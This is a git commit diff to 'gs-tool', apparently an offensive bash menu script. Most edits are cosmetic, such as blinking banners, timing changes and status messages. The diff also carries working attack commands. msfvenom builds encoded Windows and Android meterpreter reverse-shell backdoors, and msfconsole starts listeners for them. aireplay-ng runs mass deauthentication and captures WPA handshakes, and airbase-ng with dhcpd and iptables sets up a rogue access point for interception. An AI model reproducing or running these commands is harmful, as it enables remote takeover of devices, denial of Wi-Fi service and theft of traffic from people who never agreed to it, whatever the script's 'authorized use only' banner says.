Update gs-tool

diff --git a/gs-tool b/gs-tool
--- a/gs-tool
+++ b/gs-tool
@@ -19,8 +19,8 @@ echo -e " \e[1;31m            ----------------------- "
 echo
 echo
 echo
-echo " this program is only intended for vulnerability research " 
-echo " on systems that you own or for which you have been authorized "
+tput blink; echo "    this program is only intended for vulnerability research " ; tput sgr0
+tput blink; echo -e " \e[1;31m   on systems that you own or for which you have been authorized " ; tput sgr0
 echo
 echo
 echo
@@ -92,7 +92,7 @@ then
 echo -e "\e[1;01m "
 echo -e "\e[1;32m "
 echo    '   -------------------------------------------------------------------------  '
-echo    '                [!]   These are educational test options   [!]                '
+tput blink; echo    '                [!]   These are educational test options   [!]                '; tput sgr0
 echo    '   -------------------------------------------------------------------------  '
 echo    '   [$] clear : clear                  | [$] ifconfig : ifconfig            |  '
 echo -e '\e[1;31m   -------------------------------------------------------------------------  '
@@ -293,9 +293,9 @@ echo
 echo -e ' \e[1;31m '
 read -p 'interface : ' winterface
 echo -e ' \e[1;37m '
-n_secondes=15
+n_secondes=35
 ( xterm -title wait... -e "airodump-ng $winterface >> lewifi1.txt") &
-sleep 15
+sleep 35
 kill $!
 cat lewifi1.txt
 rm -r -f lewifi1.txt
@@ -353,7 +353,7 @@ read -p 'security : ' apsec
  rm -r -f lewifi1.txt
  echo
  echo
- xterm -title crack -e airodump-ng -c $apch --bssid $apbssid -w $apbssid $winterface | xterm -title deauth -e aireplay-ng -0 16 -a $apbssid $winterface | echo -e  '\e[1;35m  close window if there is hanshake '
+ xterm -title crack -e airodump-ng -c $apch --bssid $apbssid -w $apbssid $winterface | xterm -title deauth -e aireplay-ng -0 16 -a $apbssid $winterface | tput blink; echo -e  '\e[1;35m  close window if there is hanshake '; tput sgr0
  xterm -title deauth -e aireplay-ng -0 16 -a $apbssid $winterface
 
       if [ $? -eq 1 ]
@@ -668,6 +668,7 @@ xterm -title "Deauthentication-Attack" -e aireplay-ng -0 122222 -a $bssidda $int
           xterm -title "Deauthentication-Attack" -e aireplay-ng -0 122222 -a $bssidda $interfaceda
           done
       fi
+sleep 5
 fi
 
 
@@ -692,31 +693,35 @@ read -p 'port : ' portbd
 echo files name
 read -p 'name : ' namebd
 
-if [ $osbd = "windows" ] 
-then
-msfvenom -p $osbd/meterpreter/reverse_tcp lhost=$hostbd -e x86/shikata_ga_nai -i 11 lport=$portbd --platform windows -f exe -a x86 > $namebd.exe
-echo
-echo
-echo
-echo listening on $hostbd : $portbd
-echo
-echo
-echo
-msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp;  set lhost $hostbd ; set lport $portbd ; exploit ; "
-fi
 
-if [ $osbd = "android" ]
-then
-msfvenom -p $osbd/meterpreter/reverse_tcp lhost=$hostbd lport=$portbd > $namebd.apk
-echo
-echo
-echo
-echo listening on $hostbd : $portbd
-echo
-echo
-echo
-msfconsole -q -x "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp;  set lhost $hostbd ; set lport $portbd ; exploit ; "
-fi
+
+
+      if [ $osbd = "windows" ] 
+      then
+      msfvenom -p $osbd/meterpreter/reverse_tcp lhost=$hostbd -e x86/shikata_ga_nai -i 11 lport=$portbd --platform windows -f exe -a x86 > $namebd.exe
+      echo
+      echo
+      echo
+      echo listening on $hostbd : $portbd
+      echo
+      echo
+      echo
+      msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp;  set lhost $hostbd ; set lport $portbd ; exploit ; "
+      fi
+
+      if [ $osbd = "android" ]
+      then
+      msfvenom -p $osbd/meterpreter/reverse_tcp lhost=$hostbd lport=$portbd > $namebd.apk
+      echo
+      echo
+      echo
+      echo listening on $hostbd : $portbd
+      echo
+      echo
+      echo
+      msfconsole -q -x "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp;  set lhost $hostbd ; set lport $portbd ; exploit ; "
+      fi
+
 
 
 fi
@@ -802,12 +807,40 @@ xterm -title cpa -e "airbase-ng $interfacecpa -e $apcpa -c 6" &
 sleep 2.5
 ifconfig at0 up 192.168.3.1 netmask 255.255.255.0
 xterm -e dhcpd -d -f -cf dhcpd12.conf &
-n_secondes=7
-( xterm -title wait... -e "airodump-ng $interfacecpa --bssid $bssidcpa -c $chcpa &>/dev/null") &
-sleep 5.5
-kill $!
+xterm -title airodump-$bssidcpa -e "airodump-ng $interfacecpa --bssid $bssidcpa -c $chcpa" &
+sleep 1.5
+
+
+
+      if [ $? -eq "0" ]
+      then
+      echo 
+      echo -e  '\e[1;33m '
+      echo "[ok] airodump-ng"
+      else
+      echo
+      echo -e  '\e[1;31m '
+      echo "[ERROR] airodump-ng"
+      fi
+
+
+sleep 1.75
+
 xterm -e aireplay-ng $interfacecpa -0 99989 -a $bssidcpa &
-sleep 5
+
+
+      if [ $? -eq "0" ]
+      then
+      echo 
+      echo -e  '\e[1;33m '
+      echo "[ok] deauth attack"
+      else
+      echo
+      echo -e  '\e[1;31m '
+      echo "[ERROR] deauth attack"
+      fi
+
+
       if [ $? -eq 1 ]
       then
           while [ $? -ne "1" ]
@@ -815,6 +848,8 @@ sleep 5
           xterm -title "Deauthentication-Attack" -e aireplay-ng -0 122222 -a $bssidcpa $interfacecpa
           done
       fi
+
+sleep 5
 
 sysctl net.ipv4.ip_forward=1
 iptables --flush
